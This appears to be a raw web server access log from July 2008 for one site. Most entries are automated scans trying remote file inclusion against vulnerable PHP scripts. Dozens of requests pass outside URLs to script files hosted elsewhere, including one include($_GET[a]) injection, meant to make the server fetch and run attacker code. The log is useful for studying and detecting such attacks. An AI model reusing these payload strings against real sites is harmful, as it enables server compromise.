74.6.18.246 - - [14/Jul/2008:11:05:05 -0700] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:11:05:14 -0700] "GET /logs/dbase.php?action=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:05:27 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.24.100.141 - - [14/Jul/2008:11:05:28 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:11:05:29 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:11:05:29 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.24.100.141 - - [14/Jul/2008:11:05:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:11:05:29 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:05:30 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:11:05:31 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:05:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.24.100.141 - - [14/Jul/2008:11:05:33 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:11:05:33 -0700] "GET /dbase.php?action=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:06:08 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:06:11 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:06:11 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.65.160 - - [14/Jul/2008:11:06:31 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.40.65.160 - - [14/Jul/2008:11:06:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.40.65.160 - - [14/Jul/2008:11:06:32 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.40.65.160 - - [14/Jul/2008:11:06:33 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.letstalkrecipes.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:06:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:06:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.24.100.141 - - [14/Jul/2008:11:06:54 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:07:46 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:07:49 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:11:07:52 -0700] "GET /logs/page.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:11:07:54 -0700] "GET /page.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.39 - - [14/Jul/2008:11:08:05 -0700] "GET /mobileoffice/?D=D HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:08:30 -0700] "GET /logs/access_080329.log//newspublish/include.php?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:08:31 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:08:31 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:11:09:19 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:09:31 -0700] "GET /logs/index2.php?showpage=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:09:36 -0700] "GET /index2.php?showpage=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:09:51 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:09:56 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:09:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:09:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:10:01 -0700] "GET /logs//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:10:13 -0700] "GET //login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:11:10:21 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:11:31 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:11:32 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:11:12:08 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:12:30 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:12:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:12:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:11:12:49 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:13:00 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:13:08 -0700] "GET //login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 0 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:13:25 -0700] "GET /logs/access_080105.log/config.php?path_to_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:13:38 -0700] "GET /logs/index1.php?menu=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:13:40 -0700] "GET /index1.php?menu=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:13:45 -0700] "GET /logs//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 0 "-" "libwww-perl/5.805" "www.dmulk.com"
206.81.97.228 - - [14/Jul/2008:11:13:50 -0700] "GET /logs/includes/db_connect.php?baseDir=http://www.firestormmedia.com/modules/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
206.81.97.228 - - [14/Jul/2008:11:13:50 -0700] "GET /includes/db_connect.php?baseDir=http://www.firestormmedia.com/modules/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:14:52 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:11:14:59 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:15:06 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:15:06 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:15:09 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:15:12 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:11:15:25 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 - "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:11:15:32 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [14/Jul/2008:11:15:39 -0700] "GET /logs/access_080128.log//My_eGallery/?basepath=http://www.colegiomedsegpontevedra.com/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:16:08 -0700] "GET //login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:16:15 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:16:18 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:16:20 -0700] "GET /logs//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.127.47.130 - - [14/Jul/2008:11:16:45 -0700] "GET /logs/access_080322.log/index1.php?p=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:16:45 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:11:16:46 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:16:47 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:16:47 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:16:47 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:16:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:17:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.65" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:17:41 -0700] "GET /logs/access_080322.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:17:52 -0700] "GET /logs/access_080225.log//modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:17:53 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:11:18:03 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:11:18:03 -0700] "GET //skin/zero_vote/error.php?dir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:11:18:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:18:08 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:18:59 -0700] "GET //popup_window.php?site_isp_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:18:59 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:11:19:00 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:19:14 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:11:19:15 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:11:19:15 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:11:19:18 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:11:19:18 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:19:20 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:19:21 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:19:43 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:19:54 -0700] "GET /logs/index2.php?DoAction=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:20:02 -0700] "GET /index2.php?DoAction=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:11:20:17 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:11:20:17 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:20:20 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:20:22 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:11:20:25 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:20:26 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:20:33 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:20:43 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:20:43 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:20:43 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:20:45 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:20:45 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:20:45 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:21:03 -0700] "GET /logs/access_071224.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:21:10 -0700] "GET /logs/access_080225.log//modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:21:10 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:21:10 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
